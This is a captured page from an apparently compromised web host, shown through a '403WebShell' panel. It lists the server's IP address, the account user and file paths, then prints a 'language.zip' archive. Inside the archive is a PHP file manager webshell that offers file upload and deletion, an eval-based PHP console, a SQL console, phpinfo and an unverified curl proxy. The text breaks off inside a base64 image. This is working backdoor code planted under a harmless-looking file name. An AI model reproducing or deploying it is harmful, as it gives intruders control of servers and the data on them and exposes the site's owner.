Done ! 403WebShell
403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.217.35
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/123click/assets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/123click/assets/language.zip
PK!����overrides/fr-FR.override.ininu&1i�SR_GUEST_FIRST_NAME="Prénom"PK!�V�overrides/index.htmlnu&1i�<!DOCTYPE html><title></title>
PK!��m�A�Afile.phpnu�[���<!doctype html>
<html>
</html>
<?php
/* PHP File manager ver 1.5 */

// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg_ntimes = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.4;



// Little default config
$fm_default_config = array (
	'make_directory' => true, 
	'new_file' => true, 
	'upload_file' => true, 
	'show_dir_size' => false, //if true, show directory size → maybe slow 
	'show_img' => true, 
	'show_php_ver' => true, 
	'show_php_ini' => false, // show path to current php.ini
	'show_gt' => true, // show generation time
	'enable_php_console' => true,
	'enable_sql_console' => true,
	'sql_server' => 'localhost',
	'sql_username' => 'root',
	'sql_password' => '',
	'sql_db' => 'test_base',
	'enable_proxy' => true,
	'show_phpinfo' => true,
	'show_xls' => true,
	'fm_settings' => true,
	'restore_time' => true,
	'fm_restore_time' => false,
);

if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) { 
	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;

// Detect browser language
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	if (!empty($lang_priority)){
		foreach ($lang_priority as $lang_arr){
			$lng = explode(';', $lang_arr);
			$lng = $lng[0];
			if(in_array($lng,$langs)){
				$language = $lng;
				break;
			}
		}
	}
} 

// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];


//translation
function __($text){
	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
	if($recursive && @is_dir($file)) {
		$els = fm_scan_dir($file, '', '', true);
		foreach ($els as $el) {
			if($el != '.' && $el != '..'){
				fm_del_files($file . '/' . $el, true);
			}
		}
	}
	if(@is_dir($file)) {
		return rmdir($file);
	} else {
		return @unlink($file);
	}
}

//file perms
function fm_rights_string($file, $if = false){
	$perms = fileperms($file);
	$info = '';
	if(!$if){
		if (($perms & 0xC000) == 0xC000) {
			//Socket
			$info = 's';
		} elseif (($perms & 0xA000) == 0xA000) {
			//Symbolic Link
			$info = 'l';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = '-';
		} elseif (($perms & 0x6000) == 0x6000) {
			//Block special
			$info = 'b';
		} elseif (($perms & 0x4000) == 0x4000) {
			//Directory
			$info = 'd';
		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special
			$info = 'c';
		} elseif (($perms & 0x1000) == 0x1000) {
			//FIFO pipe
			$info = 'p';
		} else {
			//Unknown
			$info = 'u';
		}
	}
  
	//Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
 
	//Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
 
	//World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));

	return $info;
}

function fm_convert_rights($mode) {
	$mode = str_pad($mode,9,'-');
	$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
	$mode = strtr($mode,$trans);
	$newmode = '0';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
	$newmode .= $owner . $group . $world;
	return intval($newmode, 8);
}

function fm_chmod($file, $val, $rec = false) {
	$res = @chmod(realpath($file), $val);
	if(@is_dir($file) && $rec){
		$els = fm_scan_dir($file);
		foreach ($els as $el) {
			$res = $res && fm_chmod($file . '/' . $el, $val, true);
		}
	}
	return $res;
}

//load files
function fm_download($file_name) {
    if (!empty($file_name)) {
		if (file_exists($file_name)) {
			header("Content-Disposition: attachment; filename=" . basename($file_name));   
			header("Content-Type: application/force-download");
			header("Content-Type: application/octet-stream");
			header("Content-Type: application/download");
			header("Content-Description: File Transfer");            
			header("Content-Length: " . filesize($file_name));		
			flush(); // this doesn't really matter.
			$fp = fopen($file_name, "r");
			while (!feof($fp)) {
				echo fread($fp, 65536);
				flush(); // this is essential for large downloads
			} 
			fclose($fp);
			die();
		} else {
			header('HTTP/1.0 404 Not Found', true, 404);
			header('Status: 404 Not Found'); 
			die();
        }
    } 
}

//show folder size
function fm_dir_size($f,$format=true) {
	if($format)  {
		$size=fm_dir_size($f,false);
		if($size<=1024) return $size.' bytes';
		elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';
		elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';
		elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
		elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))
		else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
	} else {
		if(is_file($f)) return filesize($f);
		$size=0;
		$dh=opendir($f);
		while(($file=readdir($dh))!==false) {
			if($file=='.' || $file=='..') continue;
			if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file);
			else $size+=fm_dir_size($f.'/'.$file,false);
		}
		closedir($dh);
		return $size+filesize($f); 
	}
}

//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
	$dir = $ndir = array();
	if(!empty($exp)){
		$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}
	if(!empty($type) && $type !== 'all'){
		$func = 'is_' . $type;
	}
	if(@is_dir($directory)){
		$fh = opendir($directory);
		while (false !== ($filename = readdir($fh))) {
			if(substr($filename, 0, 1) != '.' || $do_not_filter) {
				if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
					$dir[] = $filename;
				}
			}
		}
		closedir($fh);
		natsort($dir);
	}
	return $dir;
}

function fm_link($get,$link,$name,$title='') {
	if (empty($title)) $title=$name.' '.basename($link);
	return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}

function fm_arr_to_option($arr,$n,$sel=''){
	foreach($arr as $v){
		$b=$v[$n];
		$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
	}
	return $res;
}

function fm_lang_form ($current='en'){
return '
<form name="change_lang" method="post" action="">
	<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
		<option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
		<option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
		<option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>
		<option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
		<option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
	</select>
</form>
';
}
	
function fm_root($dirname){
	return ($dirname=='.' OR $dirname=='..');
}

function fm_php($string){
	$display_errors=ini_get('display_errors');
	ini_set('display_errors', '1');
	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set('display_errors', $display_errors);
	return $text;
}

//SHOW DATABASES
function fm_sql_connect(){
	global $fm_config;
	return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}

function fm_sql($query){
	global $fm_config;
	$query=trim($query);
	ob_start();
	$connection = fm_sql_connect();
	if ($connection->connect_error) {
		ob_end_clean();	
		return $connection->connect_error;
	}
	$connection->set_charset('utf8');
    $queried = mysqli_query($connection,$query);
	if ($queried===false) {
		ob_end_clean();	
		return mysqli_error($connection);
    } else {
		if(!empty($queried)){
			while($row = mysqli_fetch_assoc($queried)) {
				$query_result[]=  $row;
			}
		}
		$vdump=empty($query_result)?'':var_export($query_result,true);	
		ob_end_clean();	
		$connection->close();
		return '<pre>'.stripslashes($vdump).'</pre>';
	}
}

function fm_backup_tables($tables = '*', $full_backup = true) {
	global $path;
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
	if($tables == '*')	{
		$tables = array();
		$result = $mysqldb->query('SHOW TABLES');
		while($row = mysqli_fetch_row($result))	{
			$tables[] = $row[0];
		}
	} else {
		$tables = is_array($tables) ? $tables : explode(',',$tables);
	}
    
	$return='';
	foreach($tables as $table)	{
		$result = $mysqldb->query('SELECT * FROM '.$table);
		$num_fields = mysqli_num_fields($result);
		$return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
		$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
		$return.=$row2[1].$delimiter;
        if ($full_backup) {
		for ($i = 0; $i < $num_fields; $i++)  {
			while($row = mysqli_fetch_row($result)) {
				$return.= 'INSERT INTO `'.$table.'` VALUES(';
				for($j=0; $j<$num_fields; $j++)	{
					$row[$j] = addslashes($row[$j]);
					$row[$j] = str_replace("\n","\\n",$row[$j]);
					if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
					if ($j<($num_fields-1)) { $return.= ','; }
				}
				$return.= ')'.$delimiter;
			}
		  }
		} else { 
		$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
		}
		$return.="\n\n\n";
	}

	//save file
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';
	$handle = fopen($file,'w+');
	fwrite($handle,$return);
	fclose($handle);
	$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';
    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}

function fm_restore_tables($sqlFileToExecute) {
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
    // Load and explode the sql file
    $f = fopen($sqlFileToExecute,"r+");
    $sqlFile = fread($f,filesize($sqlFileToExecute));
    $sqlArray = explode($delimiter,$sqlFile);
	
    //Process the sql file by statements
    foreach ($sqlArray as $stmt) {
        if (strlen($stmt)>3){
			$result = $mysqldb->query($stmt);
				if (!$result){
					$sqlErrorCode = mysqli_errno($mysqldb->connection);
					$sqlErrorText = mysqli_error($mysqldb->connection);
					$sqlStmt      = $stmt;
					break;
           	     }
           	  }
           }
if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;
}

function fm_img_link($filename){
	return './'.basename(__FILE__).'?img='.base64_encode($filename);
}

function fm_home_style(){
	return '
input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");
	background-repeat: no-repeat;
}';
}

function fm_config_checkbox_row($name,$value) {
	global $fm_config;
	return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
}

function fm_protocol() {
	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}

function fm_site_url() {
	return fm_protocol().$_SERVER['HTTP_HOST'];
}

function fm_url($full=false) {
	$host=$full?fm_site_url():'.';
	return $host.'/'.basename(__FILE__);
}

function fm_home($full=false){
	return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}

function fm_run_input($lng) {
	global $fm_config;
	$return = !empty($fm_config['enable_'.$lng.'_console']) ? 
	'
				<form  method="post" action="'.fm_url().'" style="display:inline">
				<input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
				</form>
' : '';
	return $return;
}

function fm_url_proxy($matches) {
	$link = str_replace('&amp;','&',$matches[2]);
	$url = isset($_GET['url'])?$_GET['url']:'';
	$parse_url = parse_url($url);
	$host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
	if (substr($link,0,2)=='//') {
		$link = substr_replace($link,fm_protocol(),0,2);
	} elseif (substr($link,0,1)=='/') {
		$link = substr_replace($link,$host,0,1);	
	} elseif (substr($link,0,2)=='./') {
		$link = substr_replace($link,$host,0,2);	
	} elseif (substr($link,0,4)=='http') {
		//alles machen wunderschon
	} else {
		$link = $host.$link;
	} 
	if ($matches[1]=='href' && !strripos($link, 'css')) {
		$base = fm_site_url().'/'.basename(__FILE__);
		$baseq = $base.'?proxy=true&url=';
		$link = $baseq.urlencode($link);
	} elseif (strripos($link, 'css')){
		//как-то тоже подменять надо
	}
	return $matches[1].'="'.$link.'"';
}
 
function fm_tpl_form($lng_tpl) {
	global ${$lng_tpl.'_templates'};
	$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
	$str = '';
	foreach ($tpl_arr as $ktpl=>$vtpl) {
		$str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
	}
return '
<table>
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
</form>
</table>
';
}

function find_text_in_files($dir, $mask, $text) {
    $results = array();
    if ($handle = opendir($dir)) {
        while (false !== ($entry = readdir($handle))) {
            if ($entry != "." && $entry != "..") {
                $path = $dir . "/" . $entry;
                if (is_dir($path)) {
                    $results = array_merge($results, find_text_in_files($path, $mask, $text));
                } else {
                    if (fnmatch($mask, $entry)) {
                        $contents = file_get_contents($path);
                        if (strpos($contents, $text) !== false) {
                            $results[] = str_replace('//', '/', $path);
                        }
                    }
                }
            }
        }
        closedir($handle);
    }
    return $results;
}


/* End Functions */

// authorization
if ($auth['authorize']) {
	if (isset($_POST['login']) && isset($_POST['password'])){
		if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {
			setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization']));
			$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
		}
	}
	if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {
		echo '
';  
die();
	}
	if (isset($_POST['quit'])) {
		unset($_COOKIE[$auth['cookie_name']]);
		setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
	}
}

// Change config
if (isset($_GET['fm_settings'])) {
	if (isset($_GET['fm_config_delete'])) { 
		unset($_COOKIE['fm_config']);
		setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_url().'?fm_settings=true');
		exit(0);
	}	elseif (isset($_POST['fm_config'])) { 
		$fm_config = $_POST['fm_config'];
		setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
		$_COOKIE['fm_config'] = serialize($fm_config);
		$msg_ntimes = __('Settings').' '.__('done');
	}	elseif (isset($_POST['fm_login'])) { 
		if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
		$fm_login = json_encode($_POST['fm_login']);
		$fgc = file_get_contents(__FILE__);
		$search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg_ntimes .= __('File updated');
				if ($_POST['fm_login']['login'] != $auth['login']) $msg_ntimes .= ' '.__('Login').': '.$_POST['fm_login']['login'];
				if ($_POST['fm_login']['password'] != $auth['password']) $msg_ntimes .= ' '.__('Password').': '.$_POST['fm_login']['password'];
				$auth = $_POST['fm_login'];
			}
			else $msg_ntimes .= __('Error occurred');
			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
		}
	} elseif (isset($_POST['tpl_edited'])) { 
		$lng_tpl = $_POST['tpl_edited'];
		if (!empty($_POST[$lng_tpl.'_name'])) {
			$fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
		} elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
			$fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);
		}
		if (!empty($fm_php)) {
			$fgc = file_get_contents(__FILE__);
			$search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
			if (!empty($matches[1])) {
				$filemtime = filemtime(__FILE__);
				$replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
				if (file_put_contents(__FILE__, $replace)) {
					${$lng_tpl.'_templates'} = $fm_php;
					$msg_ntimes .= __('File updated');
				} else $msg_ntimes .= __('Error occurred');
				if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
			}	
		} else $msg_ntimes .= __('Error occurred');
	}
}

// Just show image
if (isset($_GET['img'])) {
	$file=base64_decode($_GET['img']);
	if ($info=getimagesize($file)){
		switch  ($info[2]){	//1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
			case 1: $ext='gif'; break;
			case 2: $ext='jpeg'; break;
			case 3: $ext='png'; break;
			case 6: $ext='bmp'; break;
			default: die();
		}
		header("Content-type: image/$ext");
		echo file_get_contents($file);
		die();
	}
}

// Just download file
if (isset($_GET['download'])) {
	$file=base64_decode($_GET['download']);
	fm_download($file);	
}

// Just show info
if (isset($_GET['phpinfo'])) {
	phpinfo(); 
	die();
}

// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
	$url = isset($_GET['url'])?urldecode($_GET['url']):'';
	$proxy_form = '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	<form action="" method="GET">
	<input type="hidden" name="proxy" value="true">
	'.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
	<input type="submit" value="'.__('Show').'" class="fm_input">
	</form>
</div>
';
	if ($url) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_REFERER, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
		$result = curl_exec($ch);
		curl_close($ch);
		//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
		$result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
		$result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
		echo $result;
		die();
	} 
}
?>
<!doctype html>
<html>
<head>     
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Bar-KnOW</title>
<style>
body {
	background-color:	white;
	font-family:		Verdana, Arial, Helvetica, sans-serif;
	font-size:			8pt;
	margin:				0px;
}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }

table.bg {
	background-color: #ACBBC6
}

th, td { 
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
	padding: 3px;
}

th	{
	height:				25px;
	background-color:	#006699;
	color:				#FFA34F;
	font-weight:		bold;
	font-size:			11px;
}

.row1 {
	background-color:	#EFEFEF;
}

.row2 {
	background-color:	#DEE3E7;
}

.row3 {
	background-color:	#D1D7DC;
	padding: 5px;
}

tr.row1:hover {
	background-color:	#F3FCFC;
}

tr.row2:hover {
	background-color:	#F0F6F6;
}

.whole {
	width: 100%;
}

.all tbody td:first-child{width:100%;}

textarea {
	font: 9pt 'Courier New', courier;
	line-height: 125%;
	padding: 5px;
}

.textarea_input {
	height: 1em;
}

.textarea_input:focus {
	height: auto;
}

input[type=submit]{
	background: #FCFCFC none !important;
	cursor: pointer;
}

.folder {
    background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzBC/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCDJiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBzPEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0JroR+cQYYjIxh1hILCPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs0SBojk8naZGuyBzmULCAryIXkneTD5DPkG+Qh8lsKnWJAcaT4U+IoUspqShnlEOU05QZlmDJBVaOaUt2ooVQRNY9aQq2htlKvUYeoEzR1mjnNgxZJS6WtopXTGmgXaPdpr+h0uhHdlR5Ol9BX0svpR+iX6AP0dwwNhhWDx4hnKBmbGAcYZxl3GK+YTKYZ04sZx1QwNzHrmOeZD5lvVVgqtip8FZHKCpVKlSaVGyovVKmqpqreqgtV81XLVI+pXlN9rkZVM1PjqQnUlqtVqp1Q61MbU2epO6iHqmeob1Q/pH5Z/YkGWcNMw09DpFGgsV/jvMYgC2MZs3gsIWsNq4Z1gTXE